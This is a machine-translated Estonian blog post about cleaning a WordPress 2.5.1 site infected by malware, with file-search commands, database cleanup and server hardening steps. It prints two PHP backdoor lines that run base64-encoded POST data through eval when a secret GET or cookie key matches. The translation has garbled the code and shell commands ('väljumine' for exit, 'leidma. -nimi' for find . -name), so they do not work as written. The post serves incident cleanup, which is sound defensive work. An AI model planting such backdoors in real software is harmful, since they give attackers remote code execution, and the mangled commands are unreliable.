WordPress Exploit - viirusfailide, SQL-i ja serveri turvalisuse puhastamine.

Enne loe see postitus, siis peaks näha lisada siin, Mõista midagi. :)

Leidsin selle mitmest ajaveebifailist aadressil stealthsettings.com, allpool toodutega sarnased koodid, mis ilmnesid viirusnakkuse tagajärjel WordPress ära.:

<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

xmlrpcEespool puhul on faili xmlrpc.php pärit unineAga kell grep server, näeb päris palju koodid sedalaadi allikatest.

pppffiuuu

Puhastus nakatunud failid:

Ooookkkk ...
1. Parim lahendus, pärast seda teha backupCPC ja puhastada andmebaasis on eemaldama faile WordPress (pärast hoolikat kontrollimist saate hoida faili wp-config.php ja faile, mis pole rangelt seotud wp-platvormiga) serverisse ja laadida algsed versioonist 2.5.1 (Seekord teha upgrade versiooni wp :)) http://wordpress.org/download/ . Kustuta failid sealhulgas teema, kui teil on usku, et võite vaadata neid hoolikalt.

On ilmne, et failid on mõjutanud ja teemad, mida ei ole kasutatud enne blogis ja lihtsalt muutuvad teema, ei saa seda probleemi lahendada.

./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); väljumine; }?>

2. Otsi ja kustutada kõik failid, mis sisaldavad: * _new.php, _old.php * * .jpgg, .giff * * .pngg ja faili wp-info.txt, kui üldse.

leidma. -nimi “* _new.php”
leidma. -nimi “* _old.php”
leidma. -nimi "* .jpgg"
leidma. -nimi “* _giff”
leidma. -nimi “* _pngg”
leidma. -nimi "wp-info.txt"

3. sisse / tmp Otsingu- ja kustutada nagu tmpYwbzT2

puhastamise SQL :

1. tabelis tabelis wp_options näha, kas kustutada read: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Samuti wp_options, minna active_plugins ja kustutada, kui on olemas plugin, mis lõpeb üks laiendiga * _new.php * _old.php, *. jpgg, *. GIFF, *. pngg või kui teine ​​laiendus kahtlusel hoolikalt kontrollima.

3. Tabelis wp_usersVaata, kui on kasutaja, kes ei ole kirjutatud midagi tema õigus, veerg user_nicename. Kustuta kasutaja, kuid pange tähele number ID veerus. See kasutaja võib kasutada "WordPress" nagu USER_LOGIN on loodud ja ilmub 00: 00: 00 0000-00-00.

4. Mine tabel wp_usermeta ja kustutada kõik read kuuluvad ID eespool.

Kui olete selle sql-i puhastuse teinud, keelake ja aktiveerige kõik pistikprogrammid. (ajaveebis -> Armatuurlaud -> pistikprogrammid)

Secure server:

1. Vaata, mida kataloogid ja failid "kirjutatav"(Chmod 777) ja proovige panna neid chmod mis ei võimalda nende kirjutamise igal tasandil. (Chmod 644, näiteks)

Otsi. -Perm-2-LS

2. Vaata, millised failid on bitt suid või SGID . Kui sa ei kasuta neid faile panna neid chmod 0 või eemaldada pakett, mida see sisaldab. Nad on väga ohtlikud, sest nad täitma privileege "rühm"Või"juur"Mitte tavaline kasutaja privileegid täita selle faili.

leida /-type f-perm-04000-LS
leida /-type f-perm-02000-LS

3. Vaata, mida sadamad on avatud ja proovite sulgeda või kinnitada need, mida ei kasutata.

netstat-| grep-i kuulata

Nii palju. Näen Mõned blogid on keelatud Google Search ja teised ütlevad: "Noh nad tegid!". Noh hästi olete teinud ... aga sa tead, kui Google hakkab keelata kõik alad vormimine  On rämpspost ja pane troojalaste (Trojan.Clicker.HTML) küpsistes?

1 kommentaar
Jäta vastus

teie e-posti address ei avaldata. Kohustuslikud väljad on märgitud *

Kokku
0
Aktsiad
Eelmine artikkel

Mida teha, kui sa ei leia viiruseid või blogi, kasutades Google Search. (WordPress Virus)

Järgmine artikkel

Mida ma näen, kui Googlebot ja muud veebiroomajatelt veebilehele pääseda?

Kasutajad otsivad:

nähtamatus ohutuses, tabeau de bord fisire que faire, p ァ イ ル 拡 張 子 変 更 jpgg, fertőzött failok megtisztimine,